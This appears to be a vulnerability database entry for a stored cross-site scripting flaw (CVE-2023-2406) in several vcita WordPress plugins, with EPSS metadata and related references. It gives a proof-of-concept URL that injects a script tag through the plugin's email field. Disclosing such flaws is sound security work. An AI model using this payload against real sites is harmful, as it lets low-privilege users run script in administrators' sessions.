Lucene search
WpvulndbWPEX-ID:AF2C461C-D8CE-48E1-B802-092B5F56CFBAHistoryJun 02, 2023 - 12:00 a.m.
Multiple plugins by vcita - Contributor+ Stored Cross-Site Scripting
2023-06-0200:00:00
wpvulndb
55
vcita plugin
stored cross-site scripting
live-site-parse-vcita-callback
exploit
security vulnerability
0.004 Low
EPSS
Percentile
73.3%
The plugin does not sanitize and the email field in the plugin settings, which could allow users with roles as low as contributor to inject arbitrary web scripts in the plugin settings page, which could target high privilege users such as administrators.
https://example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=aReferences
Related
nvd
nvd
CVE-2023-2406
2023-06-03 05:15:09
prion
prion
Cross site scripting
2023-06-03 05:15:00
cve
cve
CVE-2023-2406
2023-06-03 05:15:09
wpvulndb
wpvulndb
Multiple plugins by vcita - Contributor+ Stored Cross-Site Scripting
2023-06-02 00:00:00
cvelist
cvelist
CVE-2023-2406
2023-06-03 04:35:12
wordfence
wordfence